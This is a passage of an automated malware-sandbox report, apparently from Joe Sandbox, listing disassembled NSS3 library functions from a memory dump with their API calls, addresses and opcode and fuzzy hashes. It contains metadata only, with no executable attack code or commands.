                                                                        • Opcode ID: 7445bee138c9474c5b3b846e3746fa6a973bb1fabbbddf55342b538a63355a0e
                                                                        • Instruction ID: 38757b042a349e0932f8db01e66bfae44f2df6618b67abc990f340a822af208a
                                                                        • Opcode Fuzzy Hash: 7445bee138c9474c5b3b846e3746fa6a973bb1fabbbddf55342b538a63355a0e
                                                                        • Instruction Fuzzy Hash: 8A514E71A046559FDB00EF69C1846BEBBF0FF44395F158929D89C9B710DB38E884CB92
                                                                        Function 6CB1DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_Now.NSS3 ref: 6CB1DCFA
                                                                          • Part of subcall function 6CBD9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DC6
                                                                          • Part of subcall function 6CBD9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DD1
                                                                          • Part of subcall function 6CBD9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBD9DED
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB1DD40
                                                                        • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CB1DD62
                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6CB1DD71
                                                                        • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB1DD81
                                                                        • CERT_RemoveCertListNode.NSS3(?), ref: 6CB1DD8F
                                                                          • Part of subcall function 6CB306A0: TlsGetValue.KERNEL32 ref: 6CB306C2
                                                                          • Part of subcall function 6CB306A0: EnterCriticalSection.KERNEL32(?), ref: 6CB306D6
                                                                          • Part of subcall function 6CB306A0: PR_Unlock.NSS3 ref: 6CB306EB
                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6CB1DD9E
                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6CB1DDB7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                        • String ID:
                                                                        • API String ID: 653623313-0
                                                                        • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                        • Instruction ID: 0b01b27f87a5c6e9779ff280f2e9f46e3cbbb0e9ddea83090896da3da5afed2f
                                                                        • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                        • Instruction Fuzzy Hash: 87218EB6E052A59BDF029EA4EC8099EB7B4EF05218B140064E818A7B15E721ED15CBE2
                                                                        Function 6CB13C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,6CB8460B,?,?), ref: 6CB13CA9
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB13CB9
                                                                        • PL_HashTableLookup.NSS3(?), ref: 6CB13CC9
                                                                        • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB13CD6
                                                                        • PR_Unlock.NSS3 ref: 6CB13CE6
                                                                        • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CB13CF6
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB13D03
                                                                        • PR_Unlock.NSS3 ref: 6CB13D15
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                        • String ID:
                                                                        • API String ID: 1376842649-0
                                                                        • Opcode ID: 9471b91f82f78a0bb3778cfa4b9e285e255e39926523c6ca153c95679cf67648
                                                                        • Instruction ID: 04abea7cef42b5772e559896da65966de691c53b27a51c18444abc0a87e41b7a
                                                                        • Opcode Fuzzy Hash: 9471b91f82f78a0bb3778cfa4b9e285e255e39926523c6ca153c95679cf67648
                                                                        • Instruction Fuzzy Hash: 73112976E041A4EBDB022A35EC099AE3B38EB0225CF144130EC1893B11FB22D95986E1
                                                                        Function 6CB88C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB88C93
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                          • Part of subcall function 6CB68A60: TlsGetValue.KERNEL32(6CB161C4,?,6CB15F9C,00000000), ref: 6CB68A81
                                                                          • Part of subcall function 6CB68A60: TlsGetValue.KERNEL32(?,?,?,6CB15F9C,00000000), ref: 6CB68A9E
                                                                          • Part of subcall function 6CB68A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CB15F9C,00000000), ref: 6CB68AB7
                                                                          • Part of subcall function 6CB68A60: PR_Unlock.NSS3(?,?,?,?,?,6CB15F9C,00000000), ref: 6CB68AD2
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB88CFB
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB88D10
                                                                          • Part of subcall function 6CB68970: TlsGetValue.KERNEL32(?,00000000,6CB161C4,?,6CB15639,00000000), ref: 6CB68991
                                                                          • Part of subcall function 6CB68970: TlsGetValue.KERNEL32(?,?,?,?,?,6CB15639,00000000), ref: 6CB689AD
                                                                          • Part of subcall function 6CB68970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CB15639,00000000), ref: 6CB689C6
                                                                          • Part of subcall function 6CB68970: PR_WaitCondVar.NSS3 ref: 6CB689F7
                                                                          • Part of subcall function 6CB68970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CB15639,00000000), ref: 6CB68A0C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                        • String ID:
                                                                        • API String ID: 2412912262-0
                                                                        • Opcode ID: fd18b11090e0f0674c3bfab7af8239e0ff7ed03c6dd6da2091de006b52261dfb
                                                                        • Instruction ID: f124dc1b99d90ced508e46cb2501990f13a8f8a16ad9a2c0a53f309d3dba20f8
                                                                        • Opcode Fuzzy Hash: fd18b11090e0f0674c3bfab7af8239e0ff7ed03c6dd6da2091de006b52261dfb
                                                                        • Instruction Fuzzy Hash: 40B1ACB0D013489BDB15CF65CC80AAEB7BAFF48308F14452EE81AA7751E732A955CB91
                                                                        Function 6CB19C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB311C0: PR_NewLock.NSS3 ref: 6CB31216
                                                                        • free.MOZGLUE(?), ref: 6CB19E17
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB19E25
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB19E4E
                                                                        • TlsGetValue.KERNEL32 ref: 6CB19EA2
                                                                          • Part of subcall function 6CB29500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CB29546
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB19EB6
                                                                        • PR_Unlock.NSS3 ref: 6CB19ED9
                                                                        • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CB19F18
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                        • String ID:
                                                                        • API String ID: 3381623595-0
                                                                        • Opcode ID: dc800506afe2171b378c2e4865907a92f89c7e79eb77511a6fe7318ef3f3ee2a
                                                                        • Instruction ID: 30fd597cf9c275f91bf97f2aae0b40dc09e8dadffdd9172e3709159abbb1b920
                                                                        • Opcode Fuzzy Hash: dc800506afe2171b378c2e4865907a92f89c7e79eb77511a6fe7318ef3f3ee2a
                                                                        • Instruction Fuzzy Hash: 9081E4B2E046C1ABEB019F34DC40AAF77A9FF55248F144528E85987F41FB31E918C7A2
                                                                        Function 6CB2DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB2AB10: DeleteCriticalSection.KERNEL32(D958E852,6CB31397,5B5F5EC0,?,?,6CB2B1EE,2404110F,?,?), ref: 6CB2AB3C
                                                                          • Part of subcall function 6CB2AB10: free.MOZGLUE(D958E836,?,6CB2B1EE,2404110F,?,?), ref: 6CB2AB49
                                                                          • Part of subcall function 6CB2AB10: DeleteCriticalSection.KERNEL32(5D5E6CD2), ref: 6CB2AB5C
                                                                          • Part of subcall function 6CB2AB10: free.MOZGLUE(5D5E6CC6), ref: 6CB2AB63
                                                                          • Part of subcall function 6CB2AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CB2AB6F
                                                                          • Part of subcall function 6CB2AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CB2AB76
                                                                        • TlsGetValue.KERNEL32 ref: 6CB2DCFA
                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6CB2DD0E
                                                                        • PK11_IsFriendly.NSS3(?), ref: 6CB2DD73
                                                                        • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CB2DD8B
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB2DE81
                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB2DEA6
                                                                        • PR_Unlock.NSS3(?), ref: 6CB2DF08
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 519503562-0
                                                                        • Opcode ID: e519f8d4d8fad3bbad68c1bfff263e1ba73ddc54e3720c4849c27df92a8bf334
                                                                        • Instruction ID: ed40354feccf308f2ce70be4fb81cb2b25a485aac26093d5f612700eabb7c4fb
                                                                        • Opcode Fuzzy Hash: e519f8d4d8fad3bbad68c1bfff263e1ba73ddc54e3720c4849c27df92a8bf334
                                                                        • Instruction Fuzzy Hash: 9A91BEB5A001459BDF00DF78E880BBEB7B1EF54309F248029D81D9B745EB39E915CBA2
                                                                        Function 6CB02D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: __allrem
                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                        • API String ID: 2933888876-3221253098
                                                                        • Opcode ID: 2dec3ff1b6803c263b55431946674f2ec9a5c789a309a8c280100812732fe5fd
                                                                        • Instruction ID: a9bd98f27ea77fd2d64c82bcfedc8e68b7fc5d35d9a838ed57ea5982c74bf0da
                                                                        • Opcode Fuzzy Hash: 2dec3ff1b6803c263b55431946674f2ec9a5c789a309a8c280100812732fe5fd
                                                                        • Instruction Fuzzy Hash: C561C371B402159FDB04CF65DC88B6A7BB1FF49354F10822DE9159B790DB30AC0ACB92
                                                                        Function 6CB3BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CERT_NewCertList.NSS3 ref: 6CB3BD1E
                                                                          • Part of subcall function 6CB12F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB12F0A
                                                                          • Part of subcall function 6CB12F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB12F1D
                                                                          • Part of subcall function 6CB557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB1B41E,00000000,00000000,?,00000000,?,6CB1B41E,00000000,00000000,00000001,?), ref: 6CB557E0
                                                                          • Part of subcall function 6CB557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CB55843
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB3BD8C
                                                                          • Part of subcall function 6CB6FAB0: free.MOZGLUE(?,-00000001,?,?,6CB0F673,00000000,00000000), ref: 6CB6FAC7
                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6CB3BD9B
                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CB3BDA9
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB3BE3A
                                                                          • Part of subcall function 6CB13E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB13EC2
                                                                          • Part of subcall function 6CB13E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB13ED6
                                                                          • Part of subcall function 6CB13E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB13EEE
                                                                          • Part of subcall function 6CB13E60: PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB13F02
                                                                          • Part of subcall function 6CB13E60: PL_FreeArenaPool.NSS3 ref: 6CB13F14
                                                                          • Part of subcall function 6CB13E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB13F27
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB3BE52
                                                                          • Part of subcall function 6CB12E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB12CDA,?,00000000), ref: 6CB12E1E
                                                                          • Part of subcall function 6CB12E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB12E33
                                                                          • Part of subcall function 6CB12E00: TlsGetValue.KERNEL32 ref: 6CB12E4E
                                                                          • Part of subcall function 6CB12E00: EnterCriticalSection.KERNEL32(?), ref: 6CB12E5E
                                                                          • Part of subcall function 6CB12E00: PL_HashTableLookup.NSS3(?), ref: 6CB12E71
                                                                          • Part of subcall function 6CB12E00: PL_HashTableRemove.NSS3(?), ref: 6CB12E84
                                                                          • Part of subcall function 6CB12E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB12E96
                                                                          • Part of subcall function 6CB12E00: PR_Unlock.NSS3 ref: 6CB12EA9
                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB3BE61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                        • String ID:
                                                                        • API String ID: 2178860483-0
                                                                        • Opcode ID: 58c58734a435775699e95ef85a599f8d4a3b26ba958646f2b177211f65d4c616
                                                                        • Instruction ID: a4f088a1892056ca771daf7d98517f5880226683df79221bb6c8f442b7aebda8
                                                                        • Opcode Fuzzy Hash: 58c58734a435775699e95ef85a599f8d4a3b26ba958646f2b177211f65d4c616
                                                                        • Instruction Fuzzy Hash: 6241EFB6A00670AFC711DF28DC80B6A77F4EB49718F108568F94D97B51E731E818CBA2
                                                                        Function 6CB5AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CB5AB3E,?,?,?), ref: 6CB5AC35
                                                                          • Part of subcall function 6CB3CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB3CF16
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CB5AB3E,?,?,?), ref: 6CB5AC55
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB5AB3E,?,?), ref: 6CB5AC70
                                                                          • Part of subcall function 6CB3E300: TlsGetValue.KERNEL32 ref: 6CB3E33C
                                                                          • Part of subcall function 6CB3E300: EnterCriticalSection.KERNEL32(?), ref: 6CB3E350
                                                                          • Part of subcall function 6CB3E300: PR_Unlock.NSS3(?), ref: 6CB3E5BC
                                                                          • Part of subcall function 6CB3E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CB3E5CA
                                                                          • Part of subcall function 6CB3E300: TlsGetValue.KERNEL32 ref: 6CB3E5F2
                                                                          • Part of subcall function 6CB3E300: EnterCriticalSection.KERNEL32(?), ref: 6CB3E606
                                                                          • Part of subcall function 6CB3E300: PORT_Alloc_Util.NSS3(?), ref: 6CB3E613
                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CB5AC92
                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB5AB3E), ref: 6CB5ACD7
                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6CB5AD10
                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CB5AD2B
                                                                          • Part of subcall function 6CB3F360: TlsGetValue.KERNEL32(00000000,?,6CB5A904,?), ref: 6CB3F38B
                                                                          • Part of subcall function 6CB3F360: EnterCriticalSection.KERNEL32(?,?,?,6CB5A904,?), ref: 6CB3F3A0
                                                                          • Part of subcall function 6CB3F360: PR_Unlock.NSS3(?,?,?,?,6CB5A904,?), ref: 6CB3F3D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                        • String ID:
                                                                        • API String ID: 2926855110-0
                                                                        • Opcode ID: b71e1d9d17af7bb5055b08cdecec884dfedd6e905762cbf45c03aaf93d05d833
                                                                        • Instruction ID: 05155191309d62a55472984cc44ac3c191df69e9d66a01e9377a7dd5d0e91761
                                                                        • Opcode Fuzzy Hash: b71e1d9d17af7bb5055b08cdecec884dfedd6e905762cbf45c03aaf93d05d833
                                                                        • Instruction Fuzzy Hash: 12313BB1E002955FEB009F69DC409FF7776EF84718B588129E819AB740EB31ED258BB1
                                                                        Function 6CB38C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_Now.NSS3 ref: 6CB38C7C
                                                                          • Part of subcall function 6CBD9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DC6
                                                                          • Part of subcall function 6CBD9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DD1
                                                                          • Part of subcall function 6CBD9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBD9DED
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB38CB0
                                                                        • TlsGetValue.KERNEL32 ref: 6CB38CD1
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB38CE5
                                                                        • PR_Unlock.NSS3(?), ref: 6CB38D2E
                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CB38D62
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB38D93
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                        • String ID:
                                                                        • API String ID: 3131193014-0
                                                                        • Opcode ID: 9db7ded51130c603772f8de47ed85c25a0e7e6028630d6b0a5e1875c7b411d1b
                                                                        • Instruction ID: fa293ea436c2a9b4aa9d0360cebdce426cabf05038c8d15bc0961e43e2033542
                                                                        • Opcode Fuzzy Hash: 9db7ded51130c603772f8de47ed85c25a0e7e6028630d6b0a5e1875c7b411d1b
                                                                        • Instruction Fuzzy Hash: 51312571A00271ABDB019F68DC44BAAB770FF45318F14113BEA1DA7B50D732A924CBD2
